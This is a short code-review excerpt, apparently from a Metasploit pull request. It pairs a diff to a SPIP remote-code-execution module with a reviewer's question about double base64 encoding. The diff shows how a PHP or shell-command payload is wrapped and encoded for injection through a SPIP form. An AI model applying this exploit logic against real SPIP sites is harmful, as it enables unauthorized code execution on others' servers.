modules/exploits/multi/http/spip_rce_form.rb

```diff
@@ -149,16 +155,13 @@ def exploit
     end
 
     print_status("Got anti-csrf token: #{csrf}")
-
     print_status("#{rhost}:#{rport} - Attempting to exploit...")
 
-    oubli = ''
-    case target['Type']
-    when :php_memory
-      oubli = "s:#{payload.encoded.length + 6 + 2}:\"<?php #{payload.encoded}?>\";"
-    when :unix_memory
-      oubli = "s:#{payload.encoded.length + 14 + 4}:\"<?php system('#{payload.encoded}')?>\";"
-    end
+    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+    b64_payload = framework.encoders.create('php/base64').encode(phped_payload)
```

Comment:
`#php_exec_cmd` is also doing base64 encoding. Is it necessary to double base64 encode it or can that part be removed so it's only the `system()` call to execute the command.